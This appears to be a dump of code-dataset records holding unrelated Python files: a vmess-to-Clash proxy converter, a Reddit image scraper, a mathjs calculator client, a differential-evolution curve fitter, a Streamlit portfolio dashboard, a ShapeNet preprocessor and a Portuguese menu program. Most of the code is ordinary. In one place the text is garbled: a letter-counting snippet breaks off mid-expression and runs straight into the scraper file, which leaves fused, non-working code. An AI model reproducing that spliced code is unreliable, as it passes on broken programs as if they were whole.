解析订阅成proxy group(排除掉一些自己不喜欢的节点)\r\n proxies = get_vmess(vmess_url)\r\n with open(\"config/clash-proxy-group.yml\", encoding='UTF-8') as f:\r\n proxy_groups = yaml.safe_load(f)\r\n proxy_groups = generate_proxy_groups(proxy_groups, proxies)\r\n\r\n # 读取lhie1规则,加上自己的规则\r\n rule = get_rule()\r\n\r\n with open(\"config/clash-config-template.yml\", encoding=\"utf-8\") as f:\r\n template = yaml.safe_load(f)\r\n\r\n # 接口返回完整的clash文件\r\n template[\"Proxy\"] = proxies\r\n template[\"Proxy Group\"] = proxy_groups\r\n template[\"Rule\"] = rule\r\n\r\n return yaml.dump(template, sort_keys=False)\r\n\r\n\r\nclass Config:\r\n def __init__(self, rule_url):\r\n self.rule_url = rule_url\r\n\r\n\r\nconfig = Config(rule_url=\"https://raw.githubusercontent.com/lhie1/Rules/master/Clash/Rule.yaml\")\r\n\r\nif __name__ == '__main__':\r\n # 将vmess订阅链接当作参数传递进来\r\n vmess_url = \"\"\r\n 
get_clash_sub(vmess_url)\r\n","sub_path":"vmess2clash.py","file_name":"vmess2clash.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"499102605","text":"import math\n\n\nclass Data:\n \"\"\" Class to store input data for the equation being solved\n\n Args:\n t: time resolution (time step); default to 0.0001 * pi\n n: number of sample points in the domain; default to 1024 * 8\n e: evaluation time (time step stop condition); default to 0.1 * pi\n p: power that corresponds to u|u|^p\n \"\"\"\n def __init__(self, t, n, e, p):\n if t is None:\n self.time_resolution = 0.0001 * math.pi\n else:\n self.time_resolution = t\n\n if n is None:\n self.samples = 1024 * 8\n else:\n self.samples = n\n\n if e is None:\n self.evaluation_time = 0.1 * math.pi\n else:\n self.evaluation_time = e\n\n if p is None:\n self.power = 2\n else:\n self.power = p\n\n\n\n","sub_path":"finalProject/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"47878396","text":"s=input(\"\")\ns1=s.lower()\nl=[]\nl1=[]\nfor i in s1:\n if 96|()-=]',\n '', submission[\"title\"][:25]) +\n \".jpg\")\n with open(file_path, 'wb') as fo:\n for chunk in response.iter_content(4096):\n fo.write(chunk)\n fo.close()\n self.succeeded += 1\n else:\n self.failed += 1\n self.failed_list.append(submission)\n download_n += 1\n\n def print_stats(self):\n print(\"\\n\")\n self.skipped = len(self.skipped_list)\n print('Posts downloaded: {}/{} \\nSkipped: {}\\nFailed: {}'\n .format(self.succeeded, self.total_posts, self.skipped, self.failed))\n\n def save_posts(self):\n for post in self.posts:\n self.db.insert_link(post)\n self.db.save_changes()\n\n def run(self):\n print('Fetching URLS...')\n self.get_posts(self.r.get_subreddit(self.args.subreddit))\n self.download_images()\n self.save_posts()\n self.print_stats()\n\n\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"587384648","text":"import requests\nimport urllib\n\n\ndef calc(expr):\n service_url = 'http://api.mathjs.org/v4/'\n expr_encoded = urllib.parse.quote(expr)\n url = service_url + '?expr=' + expr_encoded\n response = requests.get(url)\n result = ''\n if response.status_code == 200:\n result = f'Result: {response.text}'\n else:\n result = 'Error happened. 
Try using a valid expression'\n return result\n\n\nif __name__ == '__main__':\n msg = '3*sqrt(4)+5^2*2'\n result = calc(msg)\n print(result)\n","sub_path":"services/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"599956754","text":"import random\nimport sys\nprint(sys.version)\nimport pandas as pd\n#import math\nimport numpy as np\n\nclass GenomDifEvolModel:\n def __init__(self, n, iterations_count, population_size, F, C):\n self.coefficients = None\n self.n = n\n self.iterations_count = iterations_count\n self.population_size = population_size\n self.F = F\n self.C = C\n\n def __str__(self):\n if not self.coefficients:\n return \"Model is empty\"\n c = self.coefficients\n s = str(c[0])\n for i in range(1, len(c)):\n last = \" - \" + s[1:] if s.startswith(\"-\") else \" + \" + s\n s = str(c[i]) + \"*x^\" + str(i) + last\n return s\n\n def fit(self, x, y):\n population = self.generate_random_population()\n best_error = sys.maxsize\n best_model = None\n for i in range(self.iterations_count):\n print(\"Iteration: \", i, best_error, best_model)\n for j in range(len(population)):\n x_pop = population[j]\n a, b, c = self.generate_random_a_b_c(population, j)\n k = random.randint(0, self.n)\n new_x = list(x_pop)\n for yi in range(len(x_pop)):\n r = random.randint(0, 100)/100.\n if yi == k or r < self.C:\n new_x[yi] = a[yi] + self.F * (b[yi] - c[yi])\n x_value = [self.getval(xpoint, x_pop) for xpoint in x]\n x_error = compare(x_value, y)\n x_new_value = [self.getval(xpoint, new_x) for xpoint in x]\n x_new_error = compare(x_new_value, y)\n if best_error > x_error:\n best_model = x_pop\n best_error = x_error\n if x_error > x_new_error:\n population[j] = new_x\n if best_error > x_new_error:\n best_model = new_x\n best_error = x_new_error\n\n self.coefficients = best_model\n\n def predict(self, x):\n return [self.getval(i, self.coefficients) for i in x]\n\n def generate_random_population(self):\n return [self.generate_random_coefficients() for i in range(self.population_size)]\n\n def generate_random_coefficients(self):\n return [random.randint(-1000, 1000)/1000. 
for i in range(self.n + 1)]\n\n def generate_random_a_b_c(self, population, xi):\n result = []\n exist = [xi]\n for i in range(3):\n j = random.randint(0, len(population) - 1)\n while j in exist:\n j = random.randint(0, len(population) - 1)\n exist.append(j)\n result.append(population[j])\n return result\n\n\n def getval(self, xpoint, coefficients):\n s = 0.0\n for i in range(self.n, 0, -1):\n s = (s + coefficients[i]) * xpoint\n return s + coefficients[0]\n\ndef compare(predict, real):\n diff = (predict - real)\n diff = diff*diff\n diff = np.sqrt(diff.sum()/len(diff))\n return diff\n\ndef cross_validation(index, k = 2, shuffle = True, seed = 1):\n rand = np.random.RandomState(seed)\n ind = rand.choice(index, size = len(index),replace = False) if shuffle else index\n for i in range(0,k):\n training = [x for j,x in enumerate(ind) if j % k != i]\n validation = [x for j,x in enumerate(ind) if j % k == i]\n yield training, validation\n\ndef cv_model(model, dataset, value, response, cv_folds):\n results_learn = []\n results_valid = []\n for i in range(cv_folds):\n for train_index, valid_index in cross_validation(dataset.index, seed = i):\n #print(train_index, valid_index)\n try:\n train_set = dataset.ix[train_index]\n valid_set = dataset.ix[valid_index]\n model.fit(np.array(train_set.drop(response, axis=1)[value]),\n np.array(train_set[response]))\n predict_learn = model.predict(np.array(train_set[value]))\n predict_valid = model.predict(np.array(valid_set[value]))\n results_learn.append(compare(predict_learn, np.array(train_set[response])))\n results_valid.append(compare(predict_valid, np.array(valid_set[response])))\n except np.linalg.LinAlgError:\n pass\n #print(\"Warn LinAlgError\")\n results = (np.mean(results_learn), np.std(results_learn), np.mean(results_valid), np.std(results_valid))\n print(results)\n return results\n\ndef tune_model(dataset, value, response, cv_folds, max_n):\n results = []\n for i in range(4, max_n + 1):\n print(\"CV on \" + str(i) + \" degree model\")\n results.append(cv_model(GenomDifEvolModel(i, iterations_count, population_size, F, C),\n dataset, value, response, cv_folds))\n return pd.DataFrame(results, index=range(4, max_n + 1), columns=[\"mean_learn\", \"std_learn\", \"mean_valid\", \"std_valid\"])\n\ndataset_learn_name = \"learn.txt\"\ndataset_test_name = \"test.txt\"\ncv_folds = 5\nmax_n = 20\niterations_count = 100\npopulation_size = 100\nF = 1.5\nC = 0.1\n\nprint(\"Training model. dataset:\" + dataset_learn_name + \", folds: \" + str(cv_folds) + \", max n: \" + str(max_n))\ndataset_learn = pd.read_csv(dataset_learn_name, header=None, sep=\"\\t\")\ncolumns = dataset_learn.columns\ntune_results = tune_model(dataset_learn, columns[0], columns[1], cv_folds, max_n)\n#print(tune_results)\n#print(tune_results[\"mean_valid\"].idxmin())\n\nbest_result_n = tune_results[\"mean_valid\"].idxmin()\nbest_model = GenomDifEvolModel(best_result_n, iterations_count, population_size, F, C)\nbest_model.fit(np.array(dataset_learn[columns[0]]), np.array(dataset_learn[columns[1]]))\nprint(\"Best model: \" + str(best_result_n) + \" degree. 
\" + str(best_model) + \"\\n\")\nprint(\"Errors: \")\nprint(tune_results.ix[best_result_n])\n\ndataset_test = pd.read_csv(dataset_test_name, header=None, sep=\"\\t\")\ncolumns = dataset_test.columns\npredict = best_model.predict(np.array(dataset_test[columns[0]]))\nerror_on_test = compare(predict, np.array(dataset_test[columns[1]]))\nprint(\"\\nError on test: \" + str(error_on_test))\n\n#PolinomModel(i)\n#print(dataset.shape[0])","sub_path":"5/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174384288","text":"import time\r\nimport requests\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pkg_resources\r\nimport yfinance as yf\r\nimport datetime as dt\r\nimport plotly.express as px\r\nimport matplotlib.pyplot as plt\r\nimport streamlit as st\r\n\r\nimport statsmodels.api as sm\r\nfrom statsmodels import regression\r\n\r\nfrom dash_tools import DashTools\r\n\r\ndef diagnostics():\r\n\r\n #make a list of the required packages\r\n required = {'numpy', 'pandas', 'yfinance', 'streamlit', 'plotly', 'statsmodels', 'matplotlib'}\r\n \r\n #then make a list of the installed packages\r\n installed = {pkg.key for pkg in pkg_resources.working_set}\r\n \r\n #then get the packages that are not installed\r\n missing = required - installed\r\n \r\n #if the missing packages is greater than 0 meaning there is a package not installed\r\n if len(missing) > 0:\r\n \r\n #output that there was a problem\r\n st.write(\"there was a problem\")\r\n \r\n #then loop through the missing packages\r\n for i in missing:\r\n \r\n #output the name of the package\r\n st.subheader(\"Packages: could not find {} package try pip installing it\".format(i))\r\n \r\n #the scenario when all of the packages are installed\r\n else:\r\n \r\n #output that they have ben installed\r\n st.subheader(\"Packages: all packages installed\")\r\n \r\n url = \"http://colorado.edu?\"\r\n timeout = 5\r\n \r\n #we want to tset internet connection\r\n try:\r\n \r\n #we want to get a request page\r\n request = requests.get(url, timeout=timeout)\r\n \r\n #we want to output\r\n st.subheader(\"Internet: Connected to the internet\")\r\n \r\n #when we don't have an internet connection\r\n except (requests.ConnectionError, requests.Timeout) as exception:\r\n \r\n #then output that out\r\n st.subheader(\"No internet Connection\")\r\n \r\n try:\r\n \r\n df = pd.read_excel(\"holdings.xls\", index_col = 0)\r\n\r\n if len(df.columns) > 1:\r\n st.subheader(\"expected only 2 columns in excel file but received more\")\r\n \r\n if df.columns[0] != \"share_count\":\r\n st.subheader(\"expected 2nd coumn to be named share_count\")\r\n \r\n try:\r\n \r\n tickers = df.index.to_list()\r\n yf.download(tickers)\r\n st.subheader(\"tickers checked out\")\r\n \r\n except:\r\n st.subheader(\"possibly incorrect ticker\")\r\n \r\n try:\r\n share_count = df['share_count']\r\n \r\n for i in share_count:\r\n if i < 1:\r\n st.subheader(\"problem with share value being 0 or negative or inputted incorrectly\")\r\n \r\n except:\r\n st.subheader(\"Excel file seems fine can't find problem\")\r\n \r\n except:\r\n st.subheader(\"Couldn't find file, please read documentation for excel file\")\r\n \r\n try:\r\n \r\n #we want to test to see if it is an xlsx file\r\n test = pd.read_csv(\"holdings.xls\")\r\n st.subheader(\"file is an xls, due to the file output from the brokerage service we can only accept xls\")\r\n \r\n except:\r\n st.subheader(\"tried finding xls 
please read documentation for excel file\")\r\n \r\nst.set_page_config(layout=\"wide\")\r\n\r\n#this makes the portfolio pie diversification\r\ndef portfolio_pie(dashtools):\r\n \r\n #import the daily portfolio which keeps track of each value of the stock and the portfolio value\r\n daily_portfolio = dashtools.daily_portfolio\r\n \r\n #get the value of the portfolio into a list\r\n final_val = daily_portfolio['value'][len(daily_portfolio) - 1]\r\n \r\n #this is going to make our output dataframe\r\n pie = dashtools.weights.reset_index().drop(columns = [\"share_count\"])\r\n \r\n #then this is going to rename the column\r\n pie.columns = [\"ticker\"]\r\n \r\n #sort alphabetically\r\n pie['ticker'] = sorted(pie['ticker'])\r\n \r\n #then initialize a new column to be empty for the percetnage value\r\n pie['weight'] = \"\"\r\n \r\n #now we want to go through all of the columns except for the last one which is portfoli ovalue\r\n for counter, i in enumerate(daily_portfolio.columns[:-1]):\r\n \r\n #the [i][len(daily_portfolio) - 1] will get the last value of the stock in the fund then divide by the final value\r\n weight = daily_portfolio[i][len(daily_portfolio) - 1] / final_val\r\n \r\n #add that weight to the dataframe\r\n pie['weight'][counter] = round(weight, 4)\r\n \r\n #in this case we want to make the plotly object\r\n diversification_pie = px.pie(dashtools.weights, values = pie['weight'], names = pie['ticker'])\r\n \r\n st.subheader(\"Portfolio Diversification\")\r\n st.plotly_chart(diversification_pie)\r\n\r\n#this gets the daily returns\r\ndef daily_returns(dashtools):\r\n \r\n #this makes the header\r\n st.subheader(\"Distribution of Portfolio's Daily Returns\")\r\n \r\n #this gets the percent change\r\n port_rets = dashtools.daily_portfolio['value'].pct_change().dropna()\r\n \r\n #this makes the distplot\r\n dist_plot = px.histogram(port_rets, height = 400, width = 700, nbins = 200)\r\n \r\n #this just puts titles on it\r\n dist_plot.update_layout(showlegend = False, xaxis_title = \"Return (%)\", yaxis_title = \"frequency\", font = dict(size = 15))\r\n \r\n #output the px object to streamlit\r\n st.plotly_chart(dist_plot)\r\n\r\n#portfolio statistics function\r\ndef port_stats(dashtools):\r\n \r\n ##############################################################################\r\n #this is for daily returns\r\n ##############################################################################\r\n \r\n #lets get the last 3 days then calculate the percent change then drop values then get the last value\r\n daily_return = dashtools.daily_portfolio.tail(3)['value'].pct_change().dropna().tail(1)\r\n \r\n #then multiply that to get the percentage return\r\n daily_return = round(float(daily_return.values) *100, 2)\r\n \r\n ##############################################################################\r\n #this is for weekly returns\r\n ##############################################################################\r\n \r\n #this gest the number of days that we are looking back it is used for making a dataframe to calculate over a range\r\n lookback = {0:5, 1:5, 2:2, 3:3, 4:4, 5:5, 6:5}\r\n \r\n #how many days we want to go back\r\n cutoff = lookback[dashtools.end_date.weekday()]\r\n \r\n #then get the data and cutoff the length we want\r\n port_val = dashtools.daily_portfolio['value'].iloc[-cutoff:]\r\n \r\n #get first entry\r\n first_day = port_val.head(1).values\r\n \r\n #get last entry\r\n last_day = port_val.tail(1).values\r\n \r\n #do the percent change\r\n weekly_return = 
round(float(((last_day - first_day) / first_day) * 100), 2)\r\n \r\n ##############################################################################\r\n #ytd return\r\n ##############################################################################\r\n ytd_date = dt.datetime(dashtools.end_date.year, 1, 1)\r\n ytd_days = int((dashtools.end_date - ytd_date).days / 7 *5)\r\n ytd_return = dashtools.daily_portfolio.tail(ytd_days)['value'].iloc[[0, -1]].pct_change().dropna()\r\n ytd_return = round(float(ytd_return.values) * 100, 2)\r\n \r\n ##############################################################################\r\n #yearly returns\r\n ##############################################################################\r\n yearly_return = dashtools.daily_portfolio.tail(252).iloc[[0, -1]]['value'].pct_change().dropna()\r\n yearly_return = round(float(yearly_return.values) * 100, 2)\r\n \r\n ##############################################################################\r\n #inception\r\n ##############################################################################\r\n inception_return = dashtools.daily_portfolio['value'].iloc[[0, -1]].pct_change().dropna()\r\n inception_return = round(float(inception_return.values) * 100, 2)\r\n \r\n #output header and make sure font color is right\r\n st.markdown(\"
Today's Returns: {}%\".format(daily_return), unsafe_allow_html=True)\r\n    st.markdown(\"This week's Returns: {}%\".format(weekly_return), unsafe_allow_html=True)\r\n    st.markdown(\"365 day Return: {}%\".format(yearly_return), unsafe_allow_html=True)\r\n    st.markdown(\"YTD Returns: {}%\".format(ytd_return), unsafe_allow_html=True)\r\n    st.markdown(\"Since Inception: {}%\".format(inception_return), unsafe_allow_html=True)\r\n\r\n#makes the portfolio market statistics\r\ndef port_market(dashtools):\r\n\r\n    #365 day volatility\r\n    vol = dashtools.daily_portfolio[\"value\"].tail(252)\r\n    vol = round(np.log(vol / vol.shift(1)).std() * 252 ** .5, 2)\r\n    \r\n    #get the performance of the fund\r\n    perf = dashtools.daily_portfolio['value']\r\n    \r\n    #then get the benchmark\r\n    spx = yf.download(\"^GSPC\", perf.index[0], perf.index[-1])['Close']\r\n    \r\n    #get alpha and beta\r\n    y = dashtools.daily_portfolio['value'].pct_change().dropna().iloc[:-1]\r\n    X = spx.pct_change().dropna()\r\n    \r\n    #run the model\r\n    X = sm.add_constant(X)\r\n    model = regression.linear_model.OLS(y,X).fit()\r\n    \r\n    #then find alpha and beta\r\n    alpha = round(model.params[0], 5)\r\n    beta = round(model.params[1], 2)\r\n    \r\n    #now get the sharpe \r\n    sharpe_df = dashtools.daily_portfolio['value'].pct_change().dropna()\r\n    ret = sharpe_df.mean()\r\n    stdev = sharpe_df.std()\r\n    sharpe = round(ret / stdev, 2)\r\n    \r\n    #output the header and check the font color\r\n    st.markdown(\"365 day Volatility: {}\".format(vol), unsafe_allow_html=True)\r\n    st.markdown(\"Portfolio Alpha: {}\".format(alpha), unsafe_allow_html=True)\r\n    st.markdown(\"Portfolio Beta: {}\".format(beta), unsafe_allow_html=True)\r\n    st.markdown(\"Portfolio Sharpe: {}
    \".format(sharpe), unsafe_allow_html=True)\r\n\r\n#portfolio composition tool\r\ndef port_comp(dashtools):\r\n\r\n #then you get the monthly portfolio price\r\n monthly_portfolio = dashtools.make_monthly_portfolio()\r\n \r\n #put title\r\n st.subheader(\"Portfolio Value by Composition\")\r\n \r\n #output it to streamlit \r\n st.bar_chart(monthly_portfolio)\r\n\r\n#this makes the performance of the fund vs SPX\r\ndef spx_perf(dashtools):\r\n\r\n #get the value of the fund\r\n perf = dashtools.daily_portfolio['value']\r\n \r\n #get spx values\r\n spx = yf.download(\"^GSPC\", dashtools.start_date, dashtools.end_date)['Close']\r\n \r\n #get the number of (shares) for our SPX comparison\r\n sp_shares = int(perf[0] / spx[0])\r\n \r\n #multiply shares to our spx to get equivalent value\r\n bench = spx * sp_shares\r\n \r\n #merge for output\r\n output_df = pd.concat([perf, bench], axis = 1)\r\n \r\n #rename columns for chart\r\n output_df.columns = [\"Port\", \"SPX\"]\r\n \r\n st.subheader(\"Portfolio vs S&P 500\")\r\n st.line_chart(output_df, width = 500, height = 300)\r\n\r\ndef make_top_row(dashtools):\r\n \r\n top_col1, top_col2, top_col3 = st.beta_columns((2,2,1))\r\n \r\n with top_col1:\r\n portfolio_pie(dashtools)\r\n \r\n with top_col2:\r\n daily_returns(dashtools)\r\n \r\n with top_col3:\r\n port_stats(dashtools)\r\n\r\ndef make_bottom_row(dashtools):\r\n \r\n bottom_col1, bottom_col2, bottom_col3 = st.beta_columns((1,2,2))\r\n \r\n with bottom_col1:\r\n port_market(dashtools)\r\n \r\n with bottom_col2:\r\n port_comp(dashtools)\r\n \r\n with bottom_col3:\r\n spx_perf(dashtools)\r\n\r\nwhile True:\r\n \r\n try:\r\n \r\n #we make the dashtools here to pass through all of the functions\r\n dashtools = DashTools()\r\n \r\n except:\r\n \r\n st.title(\"Oh no a problem has occured\")\r\n \r\n diagnostics()\r\n st.subheader(\"Excel file loaded:\")\r\n break\r\n \r\n #make update date\r\n update_date = dt.datetime.today().strftime(\"%a %D %I:%M %p\")\r\n \r\n #show last time we updted\r\n st.title(\"Leed's Investment Trading Group Fund (last updated: {})\".format(update_date))\r\n \r\n make_top_row(dashtools)\r\n make_bottom_row(dashtools)\r\n \r\n st.write(\"The information provided does not constitute as investment advice\")\r\n st.write(\"Created by Diego Alvarez, not associated with Leeds Investment Trading Group Fund, Values may not be up-to-date or approximations, updates don't occur until trading day ends\")\r\n \r\n #the cost basis day provided from LITG\r\n next_update = dt.datetime.today() + dt.timedelta(seconds = 60 * 60 * 4)\r\n \r\n #get update time\r\n next_update_time = next_update.strftime(\"%a %D %I:%M %p\")\r\n \r\n #output it\r\n st.write(\"next update is scheduled for {}\".format(next_update_time))\r\n \r\n #wait 30 minutes\r\n time.sleep(60 * 60 * 4)\r\n \r\n #then rerun the app\r\n st.experimental_rerun()\r\n ","sub_path":"dash_beta/lit_dash_season1.py","file_name":"lit_dash_season1.py","file_ext":"py","file_size_in_byte":13399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470542421","text":"\nfrom datasets.configs.triangle_config import get_nearest_point_sampling_config\nfrom datasets.dataset import ShapeNetV2Dataset\nfrom tqdm import tqdm, trange\nimport shutil\n\nfrom pathlib import Path\nimport pickle\nimport threading\nimport trimesh\nimport logging\nimport time\nimport torch\n\n# add filemode=\"w\" to overwrite\nlogging.basicConfig(filename=\"preprocess_triangles.log\", level=logging.INFO,\n 
format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n\nDATA_FILE = 'calculated_data_{}.pkl'\nPARTITIONS = 100\nTHREAD_PARTITIONS = 12\n\nWAIT_ALIVE_TIME = 0.05\n\nSAMPLE_POINTS_COUNT = 500000 // PARTITIONS\nMAX_FILE_SIZE_MB = 25\n\nlogger = logging.getLogger(trimesh.__name__)\nlogger.setLevel(logging.ERROR)\n\n\ndef check_content(path):\n files = Path(path)\n conditions = [len(tuple(files.rglob('*.obj'))) > 0,\n len(tuple(files.rglob(DATA_FILE.replace('{}', '*')))) == PARTITIONS]\n return all(conditions)\n\n\ndef check_existing_parts_before(path, last_idx):\n files = Path(path)\n last_idx += 1\n for i in range(last_idx):\n if len(tuple(files.rglob(DATA_FILE.format(i)))) == 0:\n return i\n return last_idx\n\n\ndef download_data(input_dir, output_dir, timeout, regenerate=True, include_olny=None):\n \n config = get_triangle_samplit_config(SAMPLE_POINTS_COUNT)\n\n dataset = ShapeNetV2Dataset(input_dir, config, max_MB_file_size=MAX_FILE_SIZE_MB)\n\n if include_olny:\n files = list(enumerate(dataset.indexes))\n\n def filtered(x):\n for include_folder in include_olny:\n if x[1].startswith(include_folder):\n return True\n return False\n\n elements = sorted(list(map(lambda x: x[0], filter(filtered, files))))\n\n else:\n elements = [k for k in range(len(dataset))]\n\n def dump_data(index, i):\n path = dataset._get_folder_by_id(i)\n dst = Path(output_dir) / path\n try:\n start_time = time.time()\n\n value = dataset[i]\n\n for key in list(value.keys()):\n if isinstance(value[key], torch.Tensor):\n value[key] = value[key].cpu().numpy()\n\n with open(Path(dst) / DATA_FILE.format(index), 'wb') as file:\n pickle.dump(value, file)\n\n end_time = time.time()\n logging.info(\n f\"success processing folder {Path(dst) / DATA_FILE.format(index)} at {index} partition, spend time {end_time - start_time}\")\n except Exception as e:\n shutil.rmtree(dst, ignore_errors=True)\n\n logging.error(f\"Error in file {Path(dst) / DATA_FILE.format(index)}\")\n logging.error(f\"Error {e}\")\n\n threads = []\n\n for partition in range(PARTITIONS):\n\n for i in tqdm(elements):\n\n while True:\n threads = list(filter(lambda x: x[1].isAlive(), threads))\n # print(len(threads))\n if len(threads) < THREAD_PARTITIONS:\n break\n else:\n time.sleep(WAIT_ALIVE_TIME)\n # if len(threads) >= THREAD_PARTITIONS:\n # for dest,thread in threads:\n # try:\n # thread.join(timeout=timeout)\n # except Exception as e:\n # logging.error(f\"error on {dest}\")\n # shutil.rmtree(dest, ignore_errors=True)\n # threads.clear()\n\n path = dataset._get_folder_by_id(i)\n\n src = Path(input_dir) / path\n dst = Path(output_dir) / path\n\n last_existing_part = check_existing_parts_before(dst, partition)\n logging.info(f\"{path} has {last_existing_part} partitions last number\")\n if not regenerate and last_existing_part > partition:\n logging.info(f'skip {dst} partition {partition} because last_existing_part is {last_existing_part}')\n continue\n if last_existing_part == 0 or regenerate:\n shutil.rmtree(dst, ignore_errors=True)\n dst.mkdir(parents=True, exist_ok=True)\n\n thread = threading.Thread(target=dump_data, args=(last_existing_part, i))\n thread.start()\n\n threads.append((dst, thread))\n\n\nif __name__ == '__main__':\n path_to_dataset = '/home/malchul/work/datasets/ShapeNetCore.v2'\n output_path = 'data/new_shape_net_triangles'\n TIME = 6 * 60 #\n logging.info(f\"Split data to {SAMPLE_POINTS_COUNT} points in {PARTITIONS} by using {THREAD_PARTITIONS} thread\")\n download_data(path_to_dataset, output_path, TIME, 
regenerate=False, include_olny=['04379243'])\n\n\n\n\n","sub_path":"preprocessor/triangle_center_preprocessor.py","file_name":"triangle_center_preprocessor.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"448668941","text":"from qanta.extractors.abstract import AbstractFeatureExtractor\nfrom qanta.util.constants import ALPHANUMERIC\n\n\nclass TextExtractor(AbstractFeatureExtractor):\n @property\n def name(self):\n return 'text'\n\n def score_guesses(self, guesses, text):\n line = \"|text %s\" % ALPHANUMERIC.sub(' ', text.lower())\n for _ in guesses:\n yield line\n","sub_path":"qanta/extractors/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"123973467","text":"\nmenu = '''\n====================\nMENU\n====================\n0- Finaliza\n1- Cadastro\n2- Relatório Geral\n3- Relatório Acima da Média\n4- Maiores Salários\n5- Aumento salarial\n6- Idade do Mais Velho\n7- data de nascimento\n====================\nEscolha: '''\n\n# declarar as listas.\nlistaNomes = [\"Ana\",\"Carlos\",\"Pedro\"]\nlistaSalarios = [100,200,300]\nlistaSexo = ['F','M','M']\nlistaIdade = [13,25,78,]\nlistameses = ['janeiro','fevereiro','março','abril','maio','junho','julho','agosto','setembro','outulbro','novembro','dezembro']\n\nwhile True:\n escolha = input(menu)\n if escolha == '0':\n break\n elif escolha == '1':\n listaNomes.append(input(\"Digite seu nome: \"))\n listaSalarios.append(float(input(\"Digite seu salario: \")))\n listaSexo.append(input(\"Digite seu sexo: \"))\n listaIdade.append(int(input(\"Digite a idade: \")))\n elif escolha == '2':\n for indice, nome in enumerate(listaNomes):\n print(\"=-\" * 100)\n print(f\"Indice: {indice}\", end=\" \\t|\\t \")\n print(f\"Nome: {nome}\", end=\" \\t|\\t \")\n print(f\"Salário: {listaSalarios[indice]}\", end=\" \\t|\\t \")\n print(f\"Sexo: {listaSexo[indice]}\", end=\" \\t|\\t \")\n print(f\"Idade: {listaIdade[indice]}\", end=\" \\t|\\t \")\n print()\n print(\"=-\"*100)\n\n # for é o laço\n # ind é a variável que controla o laço\n # range é o intervalo. Neste caso. de 0 até o tamanho da lista. 
incremento de 1\n\n # for ind in range(0,len(listaNomes),1):\n # print(\"[\",listaNomes[ind],\"], \", listaSalarios[ind],\",\",listaSexo[ind])\n # print(listaIdade)\n # print(idadeMaisVelho)\n # print(nomeMaisVelho)\n # print(listameses[ind])\n # desta forma imprime as listas individualmente\n #print(listaNomes)\n #print(listaSalarios)\n #print(listaSexo)\n elif escolha == '3':\n # calcular a média\n soma = 0\n for salario in listaSalarios:\n soma = soma + float(salario)\n media = soma / len(listaSalarios)\n\n #quem ganha acima da média\n for x in range(0,len(listaNomes),1):\n if float(listaSalarios[x]) > media:\n print(listaNomes[x],\", \",listaSalarios[x])\n\n\n elif escolha == '4':\n maiorSalarioMasculino = 0\n maiorSalarioFEMININO = 0\n nomeMaiorSalarioFEM = \"\"\n nomeMaiorSalarioMASC = \"\"\n\n for x in range(0,len(listaSalarios),1):\n if listaSalarios[x] > maiorSalarioMasculino and listaSexo[x] == 'M':\n maiorSalarioMasculino = listaSalarios[x]\n nomeMaiorSalariosMASC = listaNomes[x]\n\n maiorSalarioFEMININO = 0\n for x in range(0,len(listaSalarios),1):\n if listaSalarios[x] > maiorSalarioFEMININO and listaSexo[x] == 'F':\n maiorSalarioFEMININO = listaSalarios[x]\n nomeMaiorSalariosFEM = listaNomes[x]\n\n print(nomeMaiorSalariosMASC, maiorSalarioMasculino)\n print(nomeMaiorSalariosFEM , maiorSalarioFEMININO)\n\n\n if maiorSalarioMasculino > maiorSalarioFEMININO:\n dif = maiorSalarioMasculino - maiorSalarioFEMININO\n else:\n dif = maiorSalarioFEMININO - maiorSalarioMasculino\n\n print(\"Diferença = \",dif)\n\n\n elif escolha == '5':\n perc = int(input(\"Digite o percentual de aumento: \"))\n\n soma = 0\n for salario in listaSalarios:\n soma = soma + float(salario)\n media = soma / len(listaSalarios)\n\n for x in range(0,len(listaSalarios),1):\n if listaSalarios[x] < float(media):\n listaSalarios[x] = listaSalarios[x] + (listaSalarios[x]*perc/100)\n\n\n\n elif escolha == '6':\n idade_maior = 0\n indice_maior = 0\n for indice, idade in enumerate(listaIdade):\n if indice == 0:\n idade_maior = idade\n indice_maior = indice\n if idade > idade_maior:\n idade_maior = idade\n indice_maior = indice\n\n print(\"Pessoa mais velha:\")\n print(f\"\\t Nome: {listaNomes[indice_maior]}\", end=\" \\t|\\t \")\n print(f\"\\t Idade: {listaIdade[indice_maior]}\")\n # print(f\"\\t Idade: {idade_maior}\")\n\n # tamanhoLaço = 3\n # primeiraVez = True\n # idadeMaisVelho = 0\n #\n # for ind in range(0,len(listaNomes),1):\n # nome = input(\"Digite o nome: \")\n # idade= int(input(\"Digite a idade: \"))\n #\n # if primeiraVez: # identifica a primeira digitação\n # nomeMaisVelho = nome\n # idadeMaisVelho= idade\n #\n # if idade > idadeMaisVelho:\n # nomeMaisVelho = nome\n # idadeMaisVelho= idade\n\n # print(\"A pessoa com mais idade é \",nomeMaisVelho)\n # print(\" e sua idade é \",idadeMaisVelho)\n elif escolha == '7':\n #\n #\n # for x in range(0,len(listameses),1):\n dia, mes, ano = input('Data (dd/mm/aaaa): ').split('/')\n print('voce nasceu em:')\n print(f\"{dia} de {listameses[int(mes) - 1]} de 